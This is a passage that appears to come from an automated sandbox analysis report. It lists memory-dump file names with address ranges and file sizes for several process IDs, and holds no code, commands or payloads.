                                                                                                                                                                                                                                                                              5.2MB

                                                                                                                                                                                                                                                                            • memory/3656-168-0x00007FF813610000-0x00007FF8136DE000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              824KB

                                                                                                                                                                                                                                                                            • memory/3656-169-0x00007FF81F9A0000-0x00007FF81F9C5000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              148KB

                                                                                                                                                                                                                                                                            • memory/3656-174-0x00007FF81B470000-0x00007FF81B484000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              80KB

                                                                                                                                                                                                                                                                            • memory/3656-175-0x00007FF81E7D0000-0x00007FF81E7DD000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              52KB

                                                                                                                                                                                                                                                                            • memory/3656-166-0x00007FF805BE0000-0x00007FF8062A5000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              6.8MB

                                                                                                                                                                                                                                                                            • memory/3656-141-0x00007FF81E830000-0x00007FF81E854000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              144KB

                                                                                                                                                                                                                                                                            • memory/3656-142-0x00007FF806480000-0x00007FF8065FF000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              1.5MB

                                                                                                                                                                                                                                                                            • memory/3656-157-0x00007FF81B750000-0x00007FF81B769000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              100KB

                                                                                                                                                                                                                                                                            • memory/3656-119-0x00007FF81E860000-0x00007FF81E88D000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              180KB

                                                                                                                                                                                                                                                                            • memory/3656-118-0x00007FF81F720000-0x00007FF81F73A000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              104KB

                                                                                                                                                                                                                                                                            • memory/3656-160-0x00007FF81F710000-0x00007FF81F71D000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              52KB

                                                                                                                                                                                                                                                                            • memory/3656-163-0x00007FF81B1B0000-0x00007FF81B1E3000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              204KB

                                                                                                                                                                                                                                                                            • memory/4704-183-0x0000000005EE0000-0x0000000005EF8000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              96KB

                                                                                                                                                                                                                                                                            • memory/4704-184-0x0000000005F30000-0x0000000005F40000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              64KB

                                                                                                                                                                                                                                                                            • memory/4704-185-0x0000000006BA0000-0x0000000006BAA000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              40KB

                                                                                                                                                                                                                                                                            • memory/5828-1341-0x000001D9486A0000-0x000001D948755000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              724KB

                                                                                                                                                                                                                                                                            • memory/5828-1340-0x000001D948680000-0x000001D94869C000-memory.dmp

                                                                                                                                                                                                                                                                              Filesize

                                                                                                                                                                                                                                                                              112KB